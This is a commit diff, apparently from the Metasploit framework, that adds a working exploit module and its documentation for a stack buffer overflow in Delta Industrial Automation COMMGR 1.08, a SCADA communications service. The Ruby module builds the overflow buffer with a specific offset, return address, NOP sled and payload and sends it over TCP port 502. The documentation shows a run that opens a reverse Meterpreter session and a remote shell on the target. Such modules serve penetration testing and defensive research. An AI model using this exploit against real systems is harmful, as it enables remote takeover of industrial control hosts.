Land #10672, Add COMMGR Buffer Overflow module

2018-10-08 10:04:52 -05:00 · 2018-10-08 10:04:52 -05:00 · ec5530ece1
parent 2c34813e6b
commit ec5530ece1
2 changed files with 142 additions and 0 deletions
--- a/documentation/modules/exploit/windows/scada/delta_ia_commgr_bof.md
+++ b/documentation/modules/exploit/windows/scada/delta_ia_commgr_bof.md
@ -0,0 +1,67 @@
+## Vulnerable Application
+
+Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.
+
+## Verification Steps
+
+  1. Install Delta Industrial Automation COMMGR 1.08
+  2. Start ```msfconsole```
+  3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
+  4. Do ```set RHOST <target_ip>```
+  5. Do ```run```
+  6. You should get a shell. :)
+
+## Scenarios
+
+### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1
+
+```
+msf > use exploit/windows/scada/delta_ia_commgr_bof
+msf exploit(windows/scada/delta_ia_commgr_bof) > show options
+
+Module options (exploit/windows/scada/delta_ia_commgr_bof):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   RHOST                   yes       The target address
+   RPORT  502              yes       The target port (TCP)
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   COMMGR 1.08 / Windows Universal
+
+
+msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
+RHOST => 192.168.3.64
+msf exploit(windows/scada/delta_ia_commgr_bof) > run
+
+[*] Started reverse TCP handler on 192.168.3.150:4444
+[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
+[*] Sending stage (179779 bytes) to 192.168.3.64
+[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700
+
+meterpreter > sysinfo
+Computer        : TEST01
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > shell
+Process 932 created.
+Channel 1 created.
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.3.64 - Meterpreter session 1 closed.  Reason: User exit
+msf exploit(windows/scada/delta_ia_commgr_bof) >
+```
--- a/modules/exploits/windows/scada/delta_ia_commgr_bof.rb
+++ b/modules/exploits/windows/scada/delta_ia_commgr_bof.rb
@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
+        Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
+        crafted packets. This module has been tested successfully on Delta Electronics Delta
+        Industrial Automation COMMGR 1.08 over
+          Windows XP SP3,
+          Windows 7 SP1, and
+          Windows 8.1.
+      },
+      'Author'         =>
+        [
+          't4rkd3vilz',    # PoC
+          'hubertwslin'    # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '44965'],
+          [ 'CVE', '2018-10594']
+        ],
+      'Payload'        =>
+        {
+          'Space'          => 640,
+          'DisableNops'    => true,
+          'BadChars'       => "\x00"
+        },
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'COMMGR 1.08 / Windows Universal',
+            {
+              'Ret'    => 0x00401e14, # p/p/r COMMGR.exe
+              'Offset' => 4164
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Jul 02 2018',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(502)
+      ])
+  end
+
+  def exploit
+    data =  rand_text_alpha(target['Offset'])
+    data << "\xeb\x27\x90\x90"    # jmp short $+27 to the NOP sled
+    data << [target.ret].pack("V")
+    data << make_nops(40)
+    data << payload.encoded
+
+    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
+    connect
+    sock.put(data)
+    disconnect
+  end
+end
+